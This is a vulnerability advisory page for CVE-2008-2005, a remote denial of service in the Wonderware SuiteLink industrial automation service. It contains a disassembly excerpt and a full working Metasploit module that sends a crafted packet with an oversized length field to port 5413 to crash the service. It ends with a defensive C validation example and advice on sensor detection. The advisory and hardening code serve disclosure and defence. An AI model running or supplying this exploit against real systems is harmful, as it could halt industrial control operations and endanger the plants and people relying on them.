WonderWare SuiteLink slssvc.exe Remote Denial of Service Vulnerability

Vulnerability ID 1116139 Vulnerability type Resource management error
Published 2008-09-17 Updated 2008-09-17
CVE number CVE-2008-2005 CNNVD-ID CNNVD-200805-037
Platform Windows CVSS score 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/6474
https://www.securityfocus.com/bid/28974
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-037
|Vulnerability details
Wonderware is a vendor of industrial automation and information software solutions. Wonderware SuiteLink contains a vulnerability in its handling of malformed request data that a remote attacker could exploit to make the service unavailable. The SuiteLink service (slssvc.exe) listens for connections on port 5413/TCP. An unauthenticated client connected to the service can send a malformed packet that causes a memory allocation made through the new() operator to fail and return a null pointer. Because the result of the allocation is not checked for errors, the program then uses the null pointer as the destination of a memory copy operation, which can trigger a memory access exception and terminate the service. The allocation failure can be triggered by specifying an oversized length field in the Registration packet. The following disassembly excerpt illustrates the cause of the vulnerability:
/-----------
.text:00405C1B mov     esi, [ebp+dwLen]            ; Our value from packet...
.text:00405C20 push    edi
.text:00405C21 test    esi, esi                    ; Check value != 0...
.text:00405C31 push    esi                         ; Alloc with our length
.text:00405C32 mov     [ebp+var_4], 0
.text:00405C39 call    operator new(uint)          ; Big values return NULL
.text:00405C3E mov     ecx, esi                    ; Memcpy with our length
.text:00405C40 mov     esi, [ebp+pDestionationAddr]
.text:00405C43 mov     [ebx+4], eax                ; new result is used as dest
.text:00405C46 mov     edi, eax                    ; address without checks..
.text:00405C48 mov     eax, ecx
.text:00405C4A add     esp, 4
.text:00405C4D shr     ecx, 2
.text:00405C50 rep movsd                           ; AV due to invalid
.text:00405C52 mov     ecx, eax                    ; destination pointer..
.text:00405C54 and     ecx, 3
------------/
|Vulnerability EXP
##
# $Id: suitlink.rb $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Wonderware SuitLink Denial of Service',
			'Description'    => %q{
				This module exploits a denial of service vulnerability
				within the SuitLink service in Wonderware products.
			},
			'Author'         => [ 'belay tows' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'BID', '28974' ],
					[ 'CVE', '2008-2005' ],
				],
			'DisclosureDate' => 'May 05 2008'))
			
			register_options([Opt::RPORT(5413),], self.class)
	end

	def run
		connect

		print_status("Sending DoS packet...")

		dos_length = 0xBAADF00D

		pkt =  "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F"
		pkt << Rex::Text.rand_text_alpha(0x14) + "\x00\x00"
		pkt << [dos_length].pack("V")

		len = [pkt.length].pack("C")
		sock.put(len)

		sock.put(pkt)

		sleep 15 # wait to avoid thread shutdown event

		disconnect
	end

end
end

# milw0rm.com [2008-09-17]
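The disassembly in the details section shows a length taken straight from the Registration packet being passed to operator new and then used as a memcpy destination with neither a bound on the length nor a check of the allocation result. The following C program is an added example, not code from the advisory, from Wonderware or from the Metasploit module: it parses a registration frame laid out the way the module above builds one (a 1-byte length prefix, 16 fixed header bytes, a 20-byte client name plus two NUL bytes, then a little-endian dwLen), rejects an oversized dwLen before any allocation is attempted, and shows the hardened allocate-then-copy sequence with the null check the service lacked. The frame layout, the 64 KiB payload ceiling and the sl_* function names are assumptions made for the example; the sample frames it builds are constructed test data.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Registration message layout, inferred from how the module above builds its
 * packet (an assumption, not a vendor specification):
 *   1 byte    frame length prefix (the module's len)
 *   16 bytes  fixed header bytes
 *   20 bytes  client name, followed by 2 NUL bytes
 *   4 bytes   little-endian length field (dwLen in the disassembly) */
#define SL_HDR_LEN      16
#define SL_NAME_LEN     20
#define SL_LEN_OFFSET   (SL_HDR_LEN + SL_NAME_LEN + 2)
#define SL_REG_BODY_LEN (SL_LEN_OFFSET + 4)

/* Assumed ceiling for a legitimate registration payload; the real service's
 * limit is not documented on the page. */
#define SL_MAX_PAYLOAD  (64u * 1024u)

enum sl_status { SL_OK = 0, SL_TRUNCATED, SL_BAD_FRAME, SL_OVERSIZED, SL_ALLOC_FAILED };

static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Validate framing and the length field before any memory is requested.
 * Returns the parsed dwLen through dwlen_out whenever the body is long enough. */
enum sl_status sl_check_registration(const uint8_t *frame, size_t frame_len,
                                     uint32_t *dwlen_out)
{
    if (frame_len < 1 + SL_REG_BODY_LEN)
        return SL_TRUNCATED;
    if ((size_t)frame[0] + 1 > frame_len || frame[0] < SL_REG_BODY_LEN)
        return SL_BAD_FRAME;            /* prefix disagrees with the bytes on the wire */

    const uint8_t *body = frame + 1;
    uint32_t dwlen = rd_le32(body + SL_LEN_OFFSET);
    if (dwlen_out)
        *dwlen_out = dwlen;
    if (dwlen > SL_MAX_PAYLOAD)
        return SL_OVERSIZED;            /* e.g. 0xBAADF00D: reject, never allocate */
    return SL_OK;
}

/* Hardened form of the alloc-then-copy sequence in the disassembly: the length
 * is bounded and the allocation result is checked before it becomes the copy
 * destination. The caller frees *dst_out on SL_OK. */
enum sl_status sl_copy_payload(const uint8_t *src, uint32_t dwlen, uint8_t **dst_out)
{
    *dst_out = NULL;
    if (dwlen > SL_MAX_PAYLOAD)
        return SL_OVERSIZED;
    uint8_t *dst = malloc(dwlen ? dwlen : 1);
    if (dst == NULL)
        return SL_ALLOC_FAILED;         /* the check slssvc.exe did not perform */
    memcpy(dst, src, dwlen);
    *dst_out = dst;
    return SL_OK;
}

/* Build a constructed registration frame carrying the given dwLen, mirroring
 * the module's layout. buf must hold at least 1 + SL_REG_BODY_LEN bytes. */
size_t sl_build_sample_frame(uint32_t dwlen, uint8_t *buf)
{
    static const uint8_t hdr[SL_HDR_LEN] = {
        0xD5,0xCF,0xC7,0xF8,0x0B,0xCD,0xD3,0x11,0xAA,0x10,0x00,0xA0,0xC9,0xEC,0xFD,0x9F };
    uint8_t *body = buf + 1;
    memcpy(body, hdr, SL_HDR_LEN);
    memset(body + SL_HDR_LEN, 'A', SL_NAME_LEN);     /* constructed client name */
    body[SL_HDR_LEN + SL_NAME_LEN] = 0;
    body[SL_HDR_LEN + SL_NAME_LEN + 1] = 0;
    body[SL_LEN_OFFSET + 0] = (uint8_t)(dwlen);
    body[SL_LEN_OFFSET + 1] = (uint8_t)(dwlen >> 8);
    body[SL_LEN_OFFSET + 2] = (uint8_t)(dwlen >> 16);
    body[SL_LEN_OFFSET + 3] = (uint8_t)(dwlen >> 24);
    buf[0] = SL_REG_BODY_LEN;
    return 1 + SL_REG_BODY_LEN;
}

int main(void)
{
    uint8_t frame[1 + SL_REG_BODY_LEN];
    uint32_t dwlen = 0;
    size_t n = sl_build_sample_frame(0xBAADF00Du, frame);
    enum sl_status st = sl_check_registration(frame, n, &dwlen);
    printf("dwLen=0x%08X status=%d (3 = oversized, rejected)\n", dwlen, st);
    n = sl_build_sample_frame(0x40u, frame);
    st = sl_check_registration(frame, n, &dwlen);
    printf("dwLen=0x%08X status=%d (0 = ok)\n", dwlen, st);
    return 0;
}
```

The same check order is what a network sensor would apply to captured 5413/TCP traffic: confirm the frame prefix matches the bytes received, then compare dwLen against a ceiling, and alert on any registration whose length field could never fit a real payload. On the service side the two separate return codes matter: SL_OVERSIZED is a policy rejection that happens before any memory is requested, while SL_ALLOC_FAILED is the path the original code fell through silently, which is why the null pointer reached rep movsd.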
|Affected products
Wonderware SuiteLink 2.0
|References

Source: US-CERT
Name: VU#596268
Link: http://www.kb.cert.org/vuls/id/596268
Source: XF
Name: suitelinkservice-slssvc-dos(42221)
Link: http://xforce.iss.net/xforce/xfdb/42221
Source: BID
Name: 28974
Link: http://www.securityfocus.com/bid/28974
Source: BUGTRAQ
Name: 20080505 CORE-2008-0129 - Wonderware SuiteLink Denial of Service vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/491623/100/0/threaded
Source: MILW0RM
Name: 6474
Link: http://www.milw0rm.com/exploits/6474
Source: MISC
Link: http://www.coresecurity.com/?action=item&id=2187
Source: SECTRACK
Name: 1019966
Link: http://www.securitytracker.com/id?1019966
Source: SECUNIA
Name: 30063
Link: http://secunia.com/advisories/30063